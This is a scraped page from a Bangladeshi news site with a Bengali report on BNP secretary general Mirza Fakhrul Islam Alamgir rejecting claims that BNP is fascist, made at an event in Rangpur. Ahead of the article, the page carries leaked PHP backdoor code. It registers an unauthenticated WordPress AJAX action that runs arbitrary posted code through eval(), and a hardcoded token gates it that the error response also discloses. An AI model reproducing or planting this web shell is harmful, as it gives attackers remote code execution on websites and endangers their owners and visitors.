// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== যারা বিএনপিকে ফ্যাসিবাদী বলে, তাদের জ্ঞানের ঘাটতি আছে: মির্জা ফখরুল | potrikaybangladesh.com
Thursday, September 17, 2026
Homeঅপরাধযারা বিএনপিকে ফ্যাসিবাদী বলে, তাদের জ্ঞানের ঘাটতি আছে: মির্জা ফখরুল

যারা বিএনপিকে ফ্যাসিবাদী বলে, তাদের জ্ঞানের ঘাটতি আছে: মির্জা ফখরুল

বিএনপিকে যারা ফ্যাসিবাদের দল বলেন, তাদের রাজনৈতিক জ্ঞানের ঘাটতি আছে বলে মন্তব্য করেছেন দলটির মহাসচিব এবং স্থানীয় সরকার, পল্লী উন্নয়ন ও সমবায় মন্ত্রী মির্জা ফখরুল ইসলাম আলমগীর।

আজ সোমবার দুপুরে রংপুর নগরের কেন্দ্রীয় বাস টার্মিনাল এলাকায় বাংলাদেশ পল্লী উন্নয়ন বোর্ডের (বিআরডিবি) নবনির্মিত বিভাগীয় কার্যালয়ের উদ্বোধন শেষে তিনি এ মন্তব্য করেন।

সাম্প্রতিক রাজনৈতিক বক্তব্যের প্রসঙ্গ টেনে ফখরুল বলেন, যারা বিএনপিকে ফ্যাসিবাদী দল হিসেবে আখ্যায়িত করেন, তাদের রাজনৈতিক জ্ঞান ও ইতিহাস সম্পর্কে ধারণার ঘাটতি রয়েছে।

বিএনপি একটি গণতান্ত্রিক রাজনৈতিক দল উল্লেখ করে তিনি বলেন, জামায়াতে ইসলামী গণতান্ত্রিক দল কি না, সেটি তাদের দলের নেতারাই মূল্যায়ন করবেন। এ বিষয়ে মন্তব্য করার প্রয়োজন নেই।

রাষ্ট্রপতি নির্বাচন নিয়ে বিএনপি মহাসচিব বলেন, সংবিধান অনুযায়ী যথাসময়েই রাষ্ট্রপতি নির্বাচন অনুষ্ঠিত হবে। বিএনপি দলীয় সিদ্ধান্ত অনুযায়ী রাষ্ট্রপতি পদে মনোনয়ন দেবে।

উদ্বোধনী অনুষ্ঠানে উপস্থিত ছিলেন রংপুরের বিভাগীয় কমিশনার মোহাম্মদ শহিদুল ইসলাম, রংপুর উন্নয়ন কর্তৃপক্ষের চেয়ারম্যান সামসুজ্জামান সামু, জেলা পরিষদের প্রশাসক সাইফুল ইসলাম, বিআরডিবির ঊর্ধ্বতন কর্মকর্তা এবং বিএনপির বিভিন্ন পর্যায়ের নেতাকর্মীরা।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments